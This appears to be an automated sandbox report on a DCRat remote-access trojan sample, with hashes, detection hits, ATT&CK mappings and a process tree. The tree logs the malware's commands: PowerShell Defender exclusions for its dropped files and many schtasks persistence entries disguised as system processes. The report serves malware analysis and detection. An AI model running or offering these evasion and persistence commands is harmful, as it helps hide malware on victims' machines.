dcrat | c2c5c7b4890445c68536c7cd99c775ee4175a9f87881feb08e94059add261670

Analysis

max time kernel
26s
max time network
68s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
01/11/2022, 02:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c2c5c7b4890445c68536c7cd99c775ee4175a9f87881feb08e94059add261670.exe
Size

1.3MB
MD5

5f8aa2c9c933251a7030f4ccd52d9144
SHA1

576b128311ebfaefacb64699b0b215a659e0f74a
SHA256

c2c5c7b4890445c68536c7cd99c775ee4175a9f87881feb08e94059add261670
SHA512

64a88caac69853524b7604140aaeeeadb93cfcc4e05176bb07f14729a494f8196ea354281da6305c237bc03a06599572fe40c97b629b428d13bc5eb45e115b4b
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 36 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3904	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4244	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2076	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3048	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4552	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4216	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4524	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3868	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5016	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5020	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5036	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4612	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4872	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3244	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3168	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2212	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3804	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3276	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4516	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4492	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4432	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4636	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4472	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4484	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4392	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1824	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	908	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	300	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	500	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	584	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1192	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1160	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1556	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1404	4820	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1056	4820	schtasks.exe	70

DCRat payload 8 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x000400000001ac03-279.dat	dcrat
behavioral1/files/0x000400000001ac03-280.dat	dcrat
behavioral1/memory/4212-281-0x0000000000330000-0x0000000000440000-memory.dmp	dcrat
behavioral1/files/0x000700000001ac0c-333.dat	dcrat
behavioral1/files/0x000700000001ac0c-334.dat	dcrat
behavioral1/files/0x000700000001ac0c-751.dat	dcrat
behavioral1/files/0x000700000001ac0c-758.dat	dcrat
behavioral1/files/0x000700000001ac0c-763.dat	dcrat

Executes dropped EXE 2 IoCs

pid	Process
4212	DllCommonsvc.exe
4792	spoolsv.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\SearchUI.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\dab4d89cac03ec	DllCommonsvc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\conhost.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\088424020bedd6	DllCommonsvc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\ELAMBKUP\56085415360792	DllCommonsvc.exe
File created	C:\Windows\RemotePackages\RemoteApps\Idle.exe	DllCommonsvc.exe
File created	C:\Windows\RemotePackages\RemoteApps\6ccacd8608530f	DllCommonsvc.exe
File created	C:\Windows\ELAMBKUP\wininit.exe	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 36 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4524	schtasks.exe
3168	schtasks.exe
2212	schtasks.exe
4516	schtasks.exe
500	schtasks.exe
1808	schtasks.exe
5020	schtasks.exe
4872	schtasks.exe
300	schtasks.exe
5016	schtasks.exe
3276	schtasks.exe
1824	schtasks.exe
4244	schtasks.exe
4484	schtasks.exe
1404	schtasks.exe
4432	schtasks.exe
4392	schtasks.exe
1556	schtasks.exe
1056	schtasks.exe
3904	schtasks.exe
3804	schtasks.exe
4636	schtasks.exe
2076	schtasks.exe
3048	schtasks.exe
4552	schtasks.exe
4216	schtasks.exe
3868	schtasks.exe
5036	schtasks.exe
3244	schtasks.exe
908	schtasks.exe
1160	schtasks.exe
4612	schtasks.exe
4492	schtasks.exe
4472	schtasks.exe
584	schtasks.exe
1192	schtasks.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	c2c5c7b4890445c68536c7cd99c775ee4175a9f87881feb08e94059add261670.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
4212	DllCommonsvc.exe
904	powershell.exe
904	powershell.exe
60	powershell.exe
904	powershell.exe
1216	powershell.exe
508	powershell.exe
200	powershell.exe
60	powershell.exe
1216	powershell.exe
232	powershell.exe
232	powershell.exe
1936	powershell.exe
1936	powershell.exe
4860	powershell.exe
4860	powershell.exe
736	powershell.exe
736	powershell.exe
904	powershell.exe
2864	powershell.exe
2864	powershell.exe
2472	powershell.exe
2472	powershell.exe
3836	powershell.exe
3836	powershell.exe
4668	powershell.exe
4668	powershell.exe
1216	powershell.exe
1216	powershell.exe
60	powershell.exe
60	powershell.exe
736	powershell.exe
4792	spoolsv.exe
4792	spoolsv.exe
508	powershell.exe
508	powershell.exe
200	powershell.exe
200	powershell.exe
3836	powershell.exe
232	powershell.exe
736	powershell.exe
1936	powershell.exe
4860	powershell.exe
2864	powershell.exe
2472	powershell.exe
508	powershell.exe
4668	powershell.exe
200	powershell.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	4212	DllCommonsvc.exe
Token: SeDebugPrivilege	904	powershell.exe
Token: SeDebugPrivilege	60	powershell.exe
Token: SeDebugPrivilege	1216	powershell.exe
Token: SeDebugPrivilege	508	powershell.exe
Token: SeDebugPrivilege	200	powershell.exe
Token: SeDebugPrivilege	232	powershell.exe
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	4860	powershell.exe
Token: SeDebugPrivilege	736	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeDebugPrivilege	4792	spoolsv.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 2640 wrote to memory of 4748	2640	c2c5c7b4890445c68536c7cd99c775ee4175a9f87881feb08e94059add261670.exe	66
PID 2640 wrote to memory of 4748	2640	c2c5c7b4890445c68536c7cd99c775ee4175a9f87881feb08e94059add261670.exe	66
PID 2640 wrote to memory of 4748	2640	c2c5c7b4890445c68536c7cd99c775ee4175a9f87881feb08e94059add261670.exe	66
PID 4748 wrote to memory of 3348	4748	WScript.exe	67
PID 4748 wrote to memory of 3348	4748	WScript.exe	67
PID 4748 wrote to memory of 3348	4748	WScript.exe	67
PID 3348 wrote to memory of 4212	3348	cmd.exe	69
PID 3348 wrote to memory of 4212	3348	cmd.exe	69
PID 4212 wrote to memory of 60	4212	DllCommonsvc.exe	107
PID 4212 wrote to memory of 60	4212	DllCommonsvc.exe	107
PID 4212 wrote to memory of 904	4212	DllCommonsvc.exe	108
PID 4212 wrote to memory of 904	4212	DllCommonsvc.exe	108
PID 4212 wrote to memory of 1216	4212	DllCommonsvc.exe	109
PID 4212 wrote to memory of 1216	4212	DllCommonsvc.exe	109
PID 4212 wrote to memory of 508	4212	DllCommonsvc.exe	110
PID 4212 wrote to memory of 508	4212	DllCommonsvc.exe	110
PID 4212 wrote to memory of 200	4212	DllCommonsvc.exe	112
PID 4212 wrote to memory of 200	4212	DllCommonsvc.exe	112
PID 4212 wrote to memory of 232	4212	DllCommonsvc.exe	113
PID 4212 wrote to memory of 232	4212	DllCommonsvc.exe	113
PID 4212 wrote to memory of 1936	4212	DllCommonsvc.exe	114
PID 4212 wrote to memory of 1936	4212	DllCommonsvc.exe	114
PID 4212 wrote to memory of 4860	4212	DllCommonsvc.exe	115
PID 4212 wrote to memory of 4860	4212	DllCommonsvc.exe	115
PID 4212 wrote to memory of 736	4212	DllCommonsvc.exe	123
PID 4212 wrote to memory of 736	4212	DllCommonsvc.exe	123
PID 4212 wrote to memory of 2864	4212	DllCommonsvc.exe	117
PID 4212 wrote to memory of 2864	4212	DllCommonsvc.exe	117
PID 4212 wrote to memory of 2472	4212	DllCommonsvc.exe	118
PID 4212 wrote to memory of 2472	4212	DllCommonsvc.exe	118
PID 4212 wrote to memory of 3836	4212	DllCommonsvc.exe	119
PID 4212 wrote to memory of 3836	4212	DllCommonsvc.exe	119
PID 4212 wrote to memory of 4668	4212	DllCommonsvc.exe	129
PID 4212 wrote to memory of 4668	4212	DllCommonsvc.exe	129
PID 4212 wrote to memory of 4792	4212	DllCommonsvc.exe	133
PID 4212 wrote to memory of 4792	4212	DllCommonsvc.exe	133

C:\Users\Admin\AppData\Local\Temp\c2c5c7b4890445c68536c7cd99c775ee4175a9f87881feb08e94059add261670.exe
"C:\Users\Admin\AppData\Local\Temp\c2c5c7b4890445c68536c7cd99c775ee4175a9f87881feb08e94059add261670.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2640
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3348
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4212
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:60
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\spoolsv.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:904
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\lsass.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1216
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\csrss.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:508
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\taskhostw.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:200
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\services.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:232
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\SearchUI.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1936
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\RemotePackages\RemoteApps\Idle.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4860
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\wininit.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\spoolsv.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2472
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\sihost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3836
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\OfficeClickToRun.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\conhost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4668
    - - C:\odt\spoolsv.exe
        
        "C:\odt\spoolsv.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4792
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TA6UjH3MJQ.bat"
        6⤵
        
        PID:4872
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:4816
        
        C:\odt\spoolsv.exe
        
        "C:\odt\spoolsv.exe"
        7⤵
        
        PID:4968
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wUBsuxMZs4.bat"
        8⤵
        
        PID:3912
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        9⤵
        
        PID:5024
        
        C:\odt\spoolsv.exe
        
        "C:\odt\spoolsv.exe"
        9⤵
        
        PID:4600
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\V68XQM6FdC.bat"
        10⤵
        
        PID:2688
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        11⤵
        
        PID:3360
        
        C:\odt\spoolsv.exe
        
        "C:\odt\spoolsv.exe"
        11⤵
        
        PID:3592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\odt\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\odt\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\odt\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\providercommon\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\providercommon\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\providercommon\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUIS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\SearchUI.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\SearchUI.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUIS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\SearchUI.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Windows\RemotePackages\RemoteApps\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Windows\RemotePackages\RemoteApps\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\odt\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\odt\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\odt\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Windows\ELAMBKUP\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\ELAMBKUP\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Windows\ELAMBKUP\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Admin\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1056

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\spoolsv.exe.log

Filesize
1KB

MD5
d63ff49d7c92016feb39812e4db10419

SHA1
2307d5e35ca9864ffefc93acf8573ea995ba189b

SHA256
375076241775962f3edc08a8c72832a00920b427a4f3332528d91d21e909fa12

SHA512
00f8c8d0336d6575b956876183199624d6f4d2056f2c0aa633a6f17c516f22ee648062d9bc419254d84c459323e9424f0da8aed9dd4e16c2926e5ba30e797d8a

Download Submit
